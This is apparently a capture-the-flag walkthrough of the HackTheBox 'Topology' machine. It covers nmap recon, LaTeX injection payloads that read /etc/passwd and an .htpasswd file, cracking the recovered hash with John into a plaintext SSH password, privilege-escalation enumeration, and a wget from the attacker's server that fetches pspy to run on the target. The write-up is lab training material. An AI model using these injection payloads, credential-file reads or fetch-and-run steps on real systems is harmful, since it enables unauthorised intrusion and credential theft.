This is a easy difficulty Linux machine from HackTheBox created by gedsic. In this scenario, my IP is 10.10.14.71 and the target’s IP is 10.129.151.145
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
Local Terminal
$ ping -c 1 10.129.151.145
PING 10.129.151.145 (10.129.151.145) 56(84) bytes of data.
64 bytes from 10.129.151.145: icmp_seq=1 ttl=62 time=174 ms
--- 10.129.151.145 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 174.093/174.093/174.093/0.000 ms
The machine is alive, and by the TTL (close to 64) we can assume and confirm that is definitely a Linux Machine
Completed SYN Stealth Scan at 16:03, 26.39s elapsed (65535 total ports)
Nmap scan report for 10.129.151.145
Host is up, received reset ttl 62 (0.0029s latency).
Scanned at 2023-07-05 16:03:03 UTC for 26s
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
443/tcp open https syn-ack ttl 62
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
Raw packets sent: 131091 (5.768MB) | Rcvd: 5122 (204.880KB)
Local Terminal
nmap -sCV -p 22,80,443 10.129.151.145 -oN Target
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-05 16:04 UTC
Nmap scan report for 10.129.151.145
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
| 256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_ 256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp open http Apache/2.4.41 (Ubuntu)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 403 connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
| Connection: close
| connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
| GenericLines:
| HTTP/1.0 400 reading request: malformed HTTP request ""
| Connection: close
| reading request: malformed HTTP request ""
| Help:
| HTTP/1.0 400 reading request: malformed HTTP request "HELP"
| Connection: close
| reading request: malformed HTTP request "HELP"
| RTSPRequest:
| HTTP/1.0 400 reading request: malformed HTTP version "RTSP/1.0"
| Connection: close
|_ reading request: malformed HTTP version "RTSP/1.0"
443/tcp open https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<...>
By searching "OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 launchpad" you can conclude that is a Ubuntu-Focal machine, this is good to know in some targets just in case that there is an specific Linux exploit.
Maybe it has some validation... let's search for different way to execute commands.
\include{password} Fail
\lstinputlisting{/etc/passwd} Fail
$\include{password}$ Fail
$\lstinputlisting{/etc/passwd}$
Reverse Shell [vdaisley]
All right, we can read files, but we can't execute commands, at this point the best option is to search for information about the target and see if you can read some files that store passwords.
For "Apache/2.4.41" it's htpasswd located at /var/www/html/, try $\lstinputlisting{/var/www/html/.htpasswd}$ it fails... what about dev? try: $\lstinputlisting{/var/www/dev/.htpasswd}$
Let's use John to crack the password
Local Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
calculus20 (?)
1g 0:00:00:05 DONE (2023-07-05 19:34) 0.1941g/s 193342p/s 193342c/s 193342C/s calebd1..caitlyn09
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now with the password, we can try login through ssh {vdaisley : calculus20}
Local Terminal
ssh vdaisley@10.129.151.145
Target Terminal [vdaisley]
cat user.txt
Privilege Escalation [vdaisley > root]
We are inside the machine, now we want to change to root.
Scouting process:
Target Terminal [vdaisley]
vdaisley@topology:/$ id
uid=1007(vdaisley) gid=1007(vdaisley) groups=1007(vdaisley)
vdaisley@topology:/$ sudo -l
[sudo] password for vdaisley:
Sorry, user vdaisley may not run sudo on topology.
vdaisley@topology:/$ find \-perm -4000 2>/dev/null
./usr/sbin/pppd
./usr/lib/openssh/ssh-keysign
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/eject/dmcrypt-get-device
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/bin/sudo
./usr/bin/fusermount
./usr/bin/umount
./usr/bin/su
./usr/bin/chsh
./usr/bin/newgrp
./usr/bin/at
./usr/bin/gpasswd
./usr/bin/mount
./usr/bin/passwd
./usr/bin/chfn
vdaisley@topology:/$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
Nothing suspicious, an alternative here is to search using pspy.
Local Terminal
python3 -m http.server 8080
Target Terminal [vdaisley]
cd /tmp
wget http://10.10.14.71:8080/pspy64
chmod +x pspy64
Open an http.server and then download pspy from the target. Then execute the file.
